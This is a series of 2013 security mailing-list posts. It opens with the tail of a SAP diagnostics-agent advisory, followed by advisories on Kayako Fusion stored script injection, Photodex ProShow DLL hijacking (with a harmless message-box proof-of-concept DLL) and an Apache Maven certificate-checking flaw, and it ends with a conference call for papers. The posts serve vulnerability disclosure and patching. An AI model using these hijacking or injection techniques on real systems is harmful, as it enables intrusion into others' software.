Locally Exploitable: No -- Authentication Required: No -- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2013-006 4. Affected Components Description == According to the vendor, “The diagnostics agent is a central component of the SAP Solution Manager system landscape” [1]. [1] http://wiki.sdn.sap.com/wiki/display/SMSETUP/Diagnostics+Agents 5. Vulnerability Details The SMD agent provides an interface listening and processing the P4 protocol, which is a proprietary SAP protocol. Using this interface it is possible to: Retrieve technical information such as versions and configurations Configure an installed application. Install/remove applications. Abusing of this default unauthenticated interface, a remote attacker would be able to install an arbitrary application, achieving full compromise on the SMD agent and the SAP instances installed on the server. Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === SAP has released SAP Note 1774568 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1774568. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2012-04-17: SAP confirms having the information of vulnerability. 2012-11-13: SAP releases security patches. 2013-02-21: Onapsis notifies availability of security advisory to security mailing lists. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce
Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities
Title: == Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities Date: = 2013-01-22 References: === http://www.vulnerability-lab.com/get_content.php?id=824 ID: SWIFT-3119 URL: http://dev.kayako.com/browse/SWIFT-3119 VL-ID: = 824 Common Vulnerability Scoring System: 4.1 Introduction: = Kayako Fusion is the world`s leading multi-channel helpdesk solution that enables organizations to deliver a better customer experience and work more effectively as a team, whatever their size. Whether over email, support tickets, self-help, live chat or voice, your customers support history is tracked in one place and can be accessed from anywhere. Proven, powerful and accessible support tools without the expense or rocket science. (Copy of the Vendor Homepage: http://www.kayako.com/products/fusion/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Kayako Fusion v4.51.1891 Application. Report-Timeline: 2013-01-04: Researcher Notification Coordination 2013-01-22: Public Disclosure Status: Published Affected Products: == Kayako Product: Fusion - CMS 4.51.1891 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Kayako Fusion v4.51.1891 Web Application. The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The first vulnerability is located in the Tickets section when processing to request via the the `Escalation` module the bound vulnerable add_tags remove_tags application parameters. The persistent injected script code will be executed directly out of the `add` section when processing to edit the earlier inserted dbms context. The secound vulnerability is located in the Base section when processing to request via the `Manage` module the bound vulnerable `CustomFieldGroup eMail` application listing. The persistent injected script code will be executed directly out of the `usergroup` listing when processing to manage the earlier inserted dbms context. The third vulnerability is located in the Live-Chat section when processing to request via the `Manage` module the bound vulnerable `Visitor Group Title` application listing. The persistent injected script code will be executed directly out of the `Visitor Group` listing when processing to manage the earlier inserted dbms context. The 4th vulnerability is located in the LanguagePhrase section when processing to request via the `Manage` module the bound vulnerable `search query` (string) application listing. The persistent injected script code will be executed directly out of the `Search Query` listing when processing to manage the earlier inserted dbms context. The 5th vulnerability is located in the Staff section when processing to request via the `Manage or Insert` module the bound vulnerable `staff name or staff group` application parameters. The persistent injected script code will be executed directly out of the `Staff`- or `Staff Edit` listing when processing to manage the earlier inserted dbms context. The vulnerabilities can be exploited with a privileged application user account and low or medium required user interaction. Successful exploitation of the vulnerability result in persistent session hijacking, persistent phishing, external redirect, external malware loads and persistent vulnerable module context manipulation. Vulnerable Section(s): [+] Tickets [+] Base [+] Live-Chat [+] LanguagePhrase [+] Staff Vulnerable Module(s): [+] Escalation/Insert - (Tickets) [+] CustomFieldGroup/Manage - (Base) [+] Staff/Insert /Staff/Edit/1 - (Base) [+] StaffGroup/Insert - (Base) [+] LiveChat/Group/Manage - (Live-Chat) [+] Manage/0 - Search - (LanguagePhrase) Vulnerable Parameter(s): [+] Add tags remove tags [+] eMail User - Listing (Profile All Sections) [+] Visitor Group Title Group Color [+] Search Query Proof of Concept: = The persistent inut validation vulnerabilities can be exploited by restricted low or medium privileged application user account with low required user interaction. For demonstration or reproduce ... Review: Add tags remove tags tr class=tablerow1_trtd class=tablerow1 align=left valign=top
[IA48] Photodex ProShow Producer v5.0.3297 Insecure Library Loading Vulnerability
Inshell Security Advisory
http://www.inshell.net
1. ADVISORY INFORMATION
---
Product:Photodex ProShow Producer
Vendor URL: www.photodex.com
Type: Uncontrolled Search Path Element [CWE-427]
Date found: 2013-02-23
Date published: 2013-02-23
CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:-
2. CREDITS
--
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
3. VERSIONS AFFECTED
Photodex ProShow Producer v5.0.3297, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
An insecure library loading vulnerability has been identified in
Photodex ProShow Producer v5.0.3297.
The application uses a fixed path to look for specific files or
libraries. This path includes directories that may not be trusted or
under user control.
By placing a custom version of a library in the application path, the
program will load it before the legitimate version. This allows an
attacker to inject custom code that will be run with the privilege of
the program or user executing the program. The following libraries could
be hijacked on this way:
d3d9.dll
dbghelp.dll
dciman32.dll
ddraw.dll
midimap.dll
mscms.dll
ws2help.dll
5. PROOF-OF-CONCEPT (CODE / Exploit)
// wine gcc -Wall -shared inject.c -o ddraw.dll
#include windows.h
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
MessageBox(0,DLL Injection,DLL Injection, 0);
}
return TRUE;
}
For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/48
6. SOLUTION
---
None
7. REPORT TIMELINE
--
2013-02-23: Discovery of the vulnerability
2013-02-23: Full Disclosure because the vendor ignored previous
reports.
8. REFERENCES
-
http://security.inshell.net/advisory/48
Fwd: [SECURITY] CVE-2013-0253 Apache Maven 3.0.4
CVE-2013-0253 Apache Maven Severity: Medium Vendor: The Apache Software Foundation Versions Affected: - Apache Maven 3.0.4 - Apache Maven Wagon 2.1, 2.2, 2.3 Description: Apache Maven 3.0.4 (with Apache Maven Wagon 2.1) has introduced a non-secure SSL mode by default. This mode disables all SSL certificate checking, including: host name verification , date validity, and certificate chain. Not validating the certificate introduces the possibility of a man-in-the-middle attack. All users are recommended to upgrade to Apache Maven 3.0.5 and Apache Maven Wagon 2.4. Credit This issue was identified by Graham Leggett -- The Apache Maven Team
CONFidence 2013 - Call for Papers - 28-29.05.2013 Krakow, Poland
Calling all practitioners in the field of IT security!
The 11th edition of the international IT security conference, CONFidence
2013, is taking place in May 28/29, 2013 (as usual it will be close to
BerlinSides and PXE so if you plan to be around Krakow or Berlin you
have to try be a part of all of that:)
We invite all to send the proposed topic and abstracts of presentation
till the 28th Fabruary 2013. Please, remember that CONFidence is an
open, international conference and all presentations should be given in
English.
If you want to send a hot, fresh topic we can wait for your submission
till the 5th March 2013 but we have to know about it so you have to send
us short note.
The answer to CfP should include:
# name, last name and e-mail address of the potential speaker
# speaker's short bio, describing his experience and skills
# speaker's place of residence
# presentation topic with short description of proposed lecture (no more
than 500 words)
# non-standard technical requirements
Applications should be sent to andrzej.targosz{@}proidea.org.pl or
slawek.j...@proidea.org.pl till the 28th February, 2013.
DISCLAIMERS
Everybody say that but we really do not accept marketing, non-technical
presentations aimed at presenting and selling any products. If your
lecture presents company or its product, please do not send it!
SPONSORSHIP- let us know if you want to support security community in
Central/Eastern Europe.
CONFidence offers many sponsorship opportunities. 100% of the
sponsorship goes directly to the attendees. If you are interested in
sponsoring, please contact slawek.jabs{@}proidea.org.pl
CONFidence conference is a non-profit event and speakers are not being
paid. However, we always try to provide financial help and
cover travel expenses and accommodation. It needs to be agreed upon
after acceptance of the submission, though.
CONFidence Team
http://2013.confidence.org.pl
--
Andrzej Targosz :1024D/E2DE0833 :gpg: http://www.proidea.org.pl/gpg/at
Fundacja Wspierania Edukacji Informatycznej PROIDEA
ul. Konarskiego 44 lok.6, 30-046 Krakow tel./fax: +4812 6171183
e-mail: andrzej.targ...@proidea.org.pl
www.proidea.org.pl
Join me at BitSpiration (Krakow, June 13-14) It's all about trading goods
http://bitspiration.com
